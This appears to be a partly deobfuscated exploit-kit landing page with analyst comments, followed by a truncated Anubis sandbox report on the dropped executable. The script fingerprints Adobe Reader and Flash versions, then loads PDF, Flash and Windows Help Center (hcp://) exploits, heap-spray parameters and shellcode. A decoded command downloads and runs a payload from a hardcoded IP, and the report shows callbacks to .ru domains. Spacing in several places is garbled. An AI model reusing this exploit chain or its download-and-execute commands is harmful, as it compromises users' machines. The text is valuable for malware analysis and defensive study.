if((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightCo ntext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if(!k || !(k.test(m) || k.test(b))) {
return a[f]
}
}
}
return null
},
getMimeEnabledPlugin: function (k, m, c) {
var e = this,
f, b = new RegExp(m, "i"),
h = "",
g = c ? new RegExp(c, "i") : 0,
a, l, d, j = e.isString(k) ? [k] : k;
for(d = 0; d < j.length; d++) {
if((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
l = f.description || h;
a = f.name || h;
if(b.test(l) || b.test(a)) {
if(!g || !(g.test(l) || g.test(a))) {
return f
}
}
}
}
return 0
},
getP luginFileVersion: function (f, b) {
var h = this,
e, d, g, a, c = -1;
if(h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if(!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for(a = 0; a < d.length; a++) {
if(c > -1 && a > c && d[a] != "0") {
return b
}
if(g[a] != d[a]) {
if(c == -1) {
c = a
}
if(d[a] != "0") {
return b
}
}
}
return e
},
AXO: window.ActiveXO bject,
getAXO: function (a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
} catch(d) {}
return f
},
c onvertFuncs: function (g) {
var a, h, f, b = / ^ [ \ $][ \ $]/,
d = {},
c = this;
for(a in g) {
if(b.test(a)) {
d[a] = 1
}
}
for(a in d) {
try {
h = a.slice(2);
if(h.length > 0 && !g[h]) {
g[h] = g[a](g);
delete g[a]
}
} catch(f) {}
}
},
initScript: function () {
var c = this,
a = navigat or,
e = "/",
i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
if(c.file) {
c.file.$ = c
}
if(c.verify) {
c.verify.$ = c
};
c.OS = 100;
if(b) {
var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win. * CE", 22.1, "Win. * Mobile", 22.2, "Pocket \\ s * PC", 22.3, "", 100];
for(f = d.length - 2; f >= 0; f = f - 2) {
if(d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.isIE = new Function("return " + e + " *@cc_on!@ * " + e + "false")();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if(c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for(f = 0; f < j.length; f++) {
if(c.getAXO(j[f])) {
c.ActiveXEnabled = true;
break
}
}
c.head = c.isDefin ed(document.getElementsByTagName) ? document.getElementsByTagName("head")[0] : null
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isSafari = (/Safari\s*\/\s*\d/i).test(i) && (/Apple/i).test(g);
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
},
init: function (c) {
var b = this,
a, c;
if(!b.isString(c)) {
return -3
}
if(c.length == 1) {
b.getVersionDelimiter = c;
return -3
}
c = c.toLowerCase().replace(/\s/g, "");
a = b[c];
if(!a || !a.getVersion) {
return -3
}
b.plugin = a;
if(!b.isDefined(a.installed)) {
a.instal led = a.version = a.version0 = a.getVersionDone = null;
a.$ = b;
a.pluginName = c
}
b.garbage = false;
if(b.isIE && !b.ActiveXEnabled) {
if(a !== b.java) {
return -2
}
}
return 1
},
fPush: function (b, a) {
var c = this;
if(c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
a.push(b)
}
},
c allArray: function (b) {
var c = this,
a;
if(c.isArray(b)) {
for(a = 0; a < b.length; a++) {
if(b[a] === null) {
return
}
c.call(b[a]);
b[a] = null
}
}
},
call: function (c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if(a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if(b.isFunc(c)) {
c(b)
}
}
},
getVersionDelimiter: ", ",
$$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h = {};
if(e < 0) {
return null
};
f = a.plugin;
if(f.getVersionDone != 1) {
f.getVersion(null, d, c);
if(f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
},
cleanup: function () {},
addWinEvent: function (d, c) {
var e = this,
a = window,
b;
if(e.isFunc(c)) {
if(a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if(a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
},
winHandler: function (d, c) {
return function () {
d();
if(typeof c == "function ") {
c()
}
}
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function (a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if(a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
},
winLoaded: false,
$$onWindowLoaded: function (a) {
return function (b) {
if(a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
},
div: null,
divID: "plugindetect",
divWidth: 50,
pluginSize: 1,
emptyDiv: function () {
var d = this,
b, h, c, a, f, g;
if(d.div && d.div.childNodes) {
for(b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if(c && c.childNodes) {
for(h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch(f) {}
}
}
if(c) {
try {
d.div.removeChild(c)
} catch(f) {}
}
}
}
if(!d.div) {
a = document.getElementById(d.divID);
if(a) {
d.div = a
}
}
if(d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch(f) {}
d.div = null
}
},
DONEfuncs: [],
onDoneEmptyDiv: function () {
var c = this,
a, b;
if(!c.winLoaded) {
ret urn
}
if(c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for(a in c) {
b = c[a];
if(b && b.funcs) {
if(b.OTF == 3) {
return
}
if(b.funcs.length && b.funcs[b.funcs.length - 1]! == null) {
return
}
}
}
for(a = 0; a < c.DONEfuncs.length; a++) {
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
},
getWidth: function (c) {
if(c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if(b.isNum(a)) {
returna
}
}
return -1
},
getTagStatus: function (m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.sp an,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if(!k || !h || !d || !c.getDOMobj(m)) {
return -2
}
if(j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
}
if(l >= i) {
return -1
}
try {
if(l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if(!m.winLoaded && c.winLoaded) {
return 1
}
if(m.winLoaded && c.isNum(b)) {
if(!c.isNum(m.count)) {
m.count = b
}
if(b - m.count >= 10) {
return 1
}
}
}
} catch(f) {}
return 0
},
getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChil d ? 1 : 0;
try {
if(b && a) {
c.firstChild.focus()
}
} catch(f) {}
return b ? c.firstChild : null
},
setStyle: fu nction(b, g) {
var f = b.style,
a, d, c = this;
if(f && g) {
for(a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch(d) {}
}
}
},
insertDivInBody: function (a, i) {
var h, f = this,
b = "pd33993399",
d = null,
j = i ? window.top.document : window.document,
c = " < ",
g = (j.getElementsByTagName("body")[0] || j.body);
if(!g) {
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
} catch(h) {}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if(g) {
if(g.firstChild && f.isDefined(g.insertBefore)) {
g.insertBefore(a, g.firstChild)
} else {
g.appendChild(a)
}
if(d) {
g.removeChild(d)
}
} else {}
},
insertHTML: function (g, b, h, a, k) {
var l, m = document,
j = this,
p, o = m.createElement("span"),
n, i, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
if(!j.isDefined(a)) {
a = ""
}
if(j.isString(g) && (/[ ^\ s]/).test(g)) {
p = f + g + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
for(n = 0; n < b.lengt h; n = n + 2) {
if(/[ ^\ s]/.test(b[n + 1])) {
p += b[n] + '="' + b[n + 1] + '" '
}
}
p += ">";
for(n = 0; n < h.length; n = n + 2) {
if(/[ ^\ s]/.test(h[n + 1])) {
p += f + 'param name="' + h[n] + '" value="' + h[n + 1] + '" / > '
}
}
p += a + f + "/" + g + ">"
} else {
p = a
}
if(!j.div) {
i = m.getElementById(j.divID);
if(i) {
j.div = i
} else {
j.div = m.createElement("div");
j.div.id = j.divID;
j.insertDivInBody(j.div)
}
j.setStyle(j.div, c.conc at(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if(!i) {
j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
}
}
if(j.div && j.div.parentNode) {
j.div.appendChild(o);
j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
if(o && o.parentNode) {
o.focus()
}
} catch(l) {}
try {
o.innerHTML = p
} catch(l) {}
if(o.childNodes.length == 1 && !(j.isGecko && j.compareNums(j.verGecko, "1,5,0,0") < 0)) {
j.setStyle(o.firstChild, c.concat(["display", "inline"]))
}
return {
span: o,
winLoaded: j.winLoaded,
tagName: (j.isString(g) ? g : "")
}
}
return {
span: null,
winLoaded: j.winLoaded,
tagName: ""
}
},
flash: {
mimeType: "application/x-shockwave-flash",
progID: "ShockwaveFlash.ShockwaveFlash",
classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
getVersion: function () {
var b = function (i) {
if(!i) {
return null
}
var e = /[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);
return e ? e[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null
};
v ar j = this, g = j.$, k, h, l = null, c = null, a = null, f, m, d;
if(!g.isIE) {
m = g.hasMimeType(j.mimeType);
if(m) {
f = g.getDOMobj(g.insertHTML("object", ["type", j.mimeType], [], "", j));
try {
l = g.getNum(f.GetVariable("$version"))
} catch(k) {}
}
if(!l) {
d = m ? m.enabledPlugin : null;
if(d && d.description) {
l = b(d.description)
}
if(l) {
l = g.getPluginFileVersion(d, l)
}
}
} else {
for(h = 15; h > 2; h--) {
c = g.getAXO(j.progID + "." + h);
if(c) {
a = h.toString();
break
}
}
if(!c) {
c = g.getAXO(j.progID)
}
if(a == "6") {
try {
c.AllowScriptAccess = "always"
} catch(k) {
return "6,0,21,0"
}
}
try {
l = b(c.GetVariable("$version"))
} catch(k) {}
if(!l && a) {
l = a
}
}
j.installed = l ? 1 : -1;
j.version = g.formatNum(l);
return true
}
},
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {},
pluginHasMimeType: function (d, c, f) {
var b = this,
e = b.$,
a;
for(a in d) {
if(d[a] && d[a].type && d[a].type == c) {
return 1
}
}
if(e.getMimeE nabledPlugin(c, f)) {
return 1
}
return 0
},
getVersion: function (l, j) {
var g = this,
d = g.$,
i, f, m, n, b = null,
h = null,
k = g.mimeType,
a, c;
if(d.isString(j)) {
j = j.replace(/\s/g, "");
if(j) {
k = j
}
} else {
j = null
}
if(d.isDefined(g.INSTALLED[k])) {
g.installed = g.INSTALLED[k];
return
}
if(!d.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if(g.getVersionDone !== 0) {
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if(!j) {
n = b
}
if(!b && d.hasMimeType(g.mimeType)) {
b = d.findNavPlugin(a, 0)
}
if(b) {
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if(!h && d.OS == 1) {
if(g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
h = "9"
} else {
if(g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
h = "8"
}
}
}
}
} else {
h = g.version
}
if(!d.isDefined(n)) {
n = d.getMimeEnabledPlugin(k, a)
}
g. in stalled = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
} else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
for(m = 0; m < 5; m++) {
if(c.test(f) && (!h || RegExp.$1 > h)) {
h = Re gExp.$1
}
}
} catch(i) {}
g.installed = h ? 1 : (b ? 0 : -1)
}
if(!g.version) {
g.version = d.formatNum(h)
}
g.INS TALLED[k] = g.installed
}
},
zz: 0
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
flashver = PluginDetect.getVersion('Flash');
} catch(e) {}
if(typeof pdfver == 'string') {
pdfver = pdfver.split('.')
} else {
pdfver = [0, 0, 0, 0]
}
if(typeof flashver == 'string') {
flashver = flashver.split('.')
} else {
flashver = [0, 0, 0, 0]
};
exec7 = 1;
function spl0() {
spl2()
}
function spl2() {
spl3()
}
functionshow_pdf(src) {
var pifr = document.createElement('IFRAME');
pifr.setAttribute('width', 1);
pifr.setAttribute('height', 1);
pifr.setAttribute('src', src);
document.body.appendChild(pifr)
}
function spl3() {
if(pdfver[0] > 0 && pdfver[0] < 8) {
exec7 = 0;
show_pdf('./content/ap1.php ? f = b6863')
} else if((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
exec7 = 0;
show_pdf('./content/ap2.php ? f = b6863')
}
spl4()
}
function spl4() {
var m = document.createElement('IFRAME');
/* below comes out to be:
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://50.116.17.63/stats/content/hcp_vbs.php?f=b6863&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
*/
m.setAttribute('src', 'hcp :// services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr' + 'ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,53,48,46,49,49,54,46,49,55,46,54,51,47,115,116,97,116,115,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,98,54,56,54,51,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr' + 'ipt > ');
/* The above checks at http://50.116.17.63/stats/content/hcp_vbs.php?f=b6863&d=0 to get instructions (below),
then goes to http://50.116.17.63/stats/w.php?e=5&f=b6863 and downexecs an exe
w=3000:
x=200:
y=1:
z=false:
a = "http://50.116.17.63/stats/w.php?e=5&f=b6863":
Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")): //Scripting.FileSystemObject
Set f=e.GetSpecialFolder(2):
b = f & "\exe.ex2":
b=Replace(b,Month("2010-02-16"),"e"):
OT = "GET":
Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")): //MSXML2.XMLHTTP
Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")) On Error resume next c.open OT, a, z:
//ADODB.Stream and Scripting.FileSystemObject , respectively
c.send() If c.Status = x Then d.Open:
d.Type = y:
d.Write c.ResponseBody:
d.SaveToFile b:
d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wm" & "player.exe":
//WScript.Shell
W.eXeC "taskkill /F /IM realplay.exe":
Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):
//1.vbs
g.Delete:
WScript.Sleep w:
Set g=o.GetFile(b):
Eval("g.Delete")
*/
m.setAttribute('width', 0);
m.setAttribute('height', 0);
document.body['appendChild'](m);
spl5()
}
function getCN() {
return 'content/score.swf'
}
function getBlockSize() {
return 1024
}
function getAllocSize() {
return 1024 * 1024
}
function getAllocCount() {
return 300
}
function getFillBytes() {
var a = '%u' + '0c0c';
return a + a;
}
function getShellCode() {
if(1) {
/* does something then download and exec http://50.116.17.63/stats/w.php?f=b6863&e=4 */
return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u52e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u181d%u1906%u1e19%u1906%u061f%u1b1e%u5b07%u495c%u5b5c%u5f07%u5806%u5840%u4e17%u4a15%u101e%u1b1e%u4d0e%u1915%u2828";
}
}
function spl5() {
var ver1 = flashver[0];
var ver2 = flashver[1];
var ver3 = flashver[2];
if(((ver1 == 10 && ver2 == 0 && ver3 > 40) || ((ver1 == 10 && ver2 > 0) && (ver1 == 10 && ver2 < 2))) || ((ver1 == 10 && ver2 == 2 && ver3 < 159) || (ver1 == 10 && ver2 < 2))) {
var fname = "content/field";
var Flash_obj = " < objectclassid ='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000'width = 10height = 10id = 'swf_id' >";
Flash_obj += " < paramname = 'movie'value = '" + fname + ".swf'/>";
al = "always";
Flash_obj += "<param name=\"allowScriptAccess\" value='" + al + "' / >";
Flash_obj += " < paramname = 'Play'value = '0'/>";
Flash_obj += "<embed src='" + fname + ".swf' id='swf_id' name='swf_id'";
Flash_obj += "allowScriptAccess='" + al + "'";
Flash_obj += "type='application/x - shockwave - flash'";
Flash_obj += "width='10' height='10' > ";
Flash_obj += " </ embed > ";
Flash_obj += " </object > ";
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
oSpan.innerHTML = Flash_obj;
}
setTimeout(end_redirect, 8000);
}
spl0();
/ ********************************* anubis report for exe below: ************************************ /
___ __ _
+ /- / | ____ __ __/ /_ (_)____ -\ +
/s h- / /| | / __ \/ / / / __ \/ / ___/ -h s\
oh-:d/ / ___ |/ / / / /_/ / /_/ / (__ ) /d:-ho
shh+hy- /_/ |_/_/ /_/\__,_/_.___/_/____/ -yh+hhs
-:+hhdhyys/- -\syyhdhh+:-
-//////dhhhhhddhhyss- Analysis Report -ssyhhddhhhhhd\\\\\\-
/++/////oydddddhhyys/ ooooooooooooooooooooo \syyhhdddddyo\\\\\++\
-+++///////odh/- -+hdo\\\\\\\+++-
+++++++++//yy+/: :\+yy\\+++++++++
/+soss+sys//yyo/os++o+: :+o++so\oyy\\sys+ssos+\
+oyyyys++o/+yss/+/oyyyy: :yyyyo\+\ssy+\o++syyyyo+
+oyyyyyyso+os/o/+yyyyyy/ \yyyyyy+\o\so+osyyyyyyo+
[#############################################################################]
Analysis Report for bc9deebcb0ccc83e6fff18b5fc924470-b21fa87a3f1c481c5c30916b63034168-1330454785
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
[#############################################################################]
Summary:
- Write to foreign memory areas:
This executable tampers with the execution of another process.
- Packed Binary:
This executable is protected with a packer in order to prevent it
from being reverse engineered.
- Execution did not terminate correctly:
The executable crashed.
- Autostart capabilities:
This executable registers processes to be executed at system start.
This could result in unwanted actions to be performed automatically.
- Changes security settings of Internet Explorer:
This system alteration could seriously affect safety surfing the World
Wide Web.
- Performs File Modification and Destruction:
The executable modifies and destructs files which are not temporary.
- Spawns Processes:
The executable produces processes during the execution.
- Performs Registry Activities:
The executable creates and/or modifies registry entries.
[=============================================================================]
Table of Contents
[=============================================================================]
- General information
- bc9deebcb0.exe
a) Registry Activities
b) File Activities
c) Process Activities
- KB00983751.exe
a) Registry Activities
b) File Activities
c) Process Activities
- Explorer.EXE
a) Registry Activities
b) File Activities
c) Process Activities
d) Other Activities
- ctfmon.exe
a) Registry Activities
b) File Activities
- msmsgs.exe
a) Registry Activities
b) File Activities
- reader_sl.exe
a) Registry Activities
b) File Activities
- wscntfy.exe
a) Registry Activities
b) File Activities
- kxuckd.exe
a) File Activities
- drlwszvxbeo.exe
a) Registry Activities
b) File Activities
- cmd.exe
a) Registry Activities
b) File Activities
[#############################################################################]
1. General Information
[#############################################################################]
[=============================================================================]
Information about Anubis' invocation
[=============================================================================]
Time needed: 252 s
Report created: 02/28/12, 19:34:48 UTC
Termination reason: Timeout
Program version: 1.75.3394
[=============================================================================]
Global Network Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
DNS Queries:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Name: [ hmvmgywkvayilcwh.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ ], Successful: [ 0 ], Protocol: [ udp ]
Name: [ xvmzegestulhtvqz.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ ], Successful: [ 0 ], Protocol: [ udp ]
Name: [ hjpyvexsutdctjol.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ 46.137.85.218 62.183.104.36 78.107.82.98 94.20.30.91 124.124.212.172 184.106.151.78 184.172.134.158 208.109.171.99 211.44.250.173 ], Successful: [ 1 ], Protocol: [ udp ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
HTTP Conversations:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
From ANUBIS:1028 to 46.137.85.218:8080 - [ hjpyvexsutdctjol.ru:8080 ]
Request: [ POST /rwx/B3_d02/in/ ], Response: [ 200 "OK" ]
[#############################################################################]
2. bc9deebcb0.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Primary Analysis Subject
Filename: bc9deebcb0.exe
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
SHA-1: b3a32d512c1e28a269e7947da4807cd39bbb6ef3
File Size: 73216 Bytes
Command Line: "C:\bc9deebcb0.exe"
Process-status
at analysis end: dead
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.DLL ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\MSVCRT.DLL ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\PSAPI.DLL ],
Base Address: [0x76BF0000 ], Size: [0x0000B000 ]
Module Name: [ C:\WINDOWS\system32\SECUR32.DLL ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\TAPI32.DLL ],
Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
Base Address: [0x76E80000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
